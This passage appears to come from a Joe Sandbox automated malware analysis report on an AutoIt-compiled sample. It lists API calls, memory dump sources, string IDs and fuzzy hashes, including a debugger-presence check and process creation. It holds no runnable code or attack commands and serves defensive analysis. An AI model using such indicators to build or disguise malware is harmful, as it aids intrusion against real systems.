                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 624084870-1403004172
                                      • Opcode ID: 1cd706e8cc0a7400549dee08d7d0421702b9d946cec317bd79e800679f07b731
                                      • Instruction ID: 15b49fc37b8f57de111d95ec962da7feb3c1bee7debb303143d90e1fa4a93f11
                                      • Opcode Fuzzy Hash: 1cd706e8cc0a7400549dee08d7d0421702b9d946cec317bd79e800679f07b731
                                      • Instruction Fuzzy Hash: 3601F77168014CAACF14EB95CD619FF7BA89F11340F10002FAA1777291EA289E0CC6BA
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 004F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004F3CCA
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 004F1CC8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 624084870-1403004172
                                      • Opcode ID: 71742916927c0b1582ccfbd0853b3513944b86169d99fa1ce06624497fcb2013
                                      • Instruction ID: 43965ef0b78a1e6675ec1fc11330246e7c9a49329a942bf06a47441f9d075159
                                      • Opcode Fuzzy Hash: 71742916927c0b1582ccfbd0853b3513944b86169d99fa1ce06624497fcb2013
                                      • Instruction Fuzzy Hash: E5012B71A4014CA7CF04EB96CE11AFF7BA89B11340F10002FB91273291EA289F08D27A
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004AA529
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer_wcslen
                                      • String ID: ,%V$3yN
                                      APIs
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00563018,0056305C), ref: 005281BF
                                      • CloseHandle.KERNEL32 ref: 005281D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: \0V
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: 3, 3, 16, 1
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004F0B23
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Message
                                      • String ID: AutoIt$Error allocating memory.
                                      APIs
                                        • Part of subcall function 004AF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,004B0D71,?,?,?,0049100A), ref: 004AF7CE
                                      • IsDebuggerPresent.KERNEL32(?,?,?,0049100A), ref: 004B0D75
                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0049100A), ref: 004B0D84
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004B0D7F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004AE3D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID: 0%V$8%V
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: %.3d$X64
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0052236C
                                      • PostMessageW.USER32(00000000), ref: 00522373
                                        • Part of subcall function 004FE97B: Sleep.KERNEL32 ref: 004FE9F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0052232C
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0052233F
                                        • Part of subcall function 004FE97B: Sleep.KERNEL32 ref: 004FE9F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd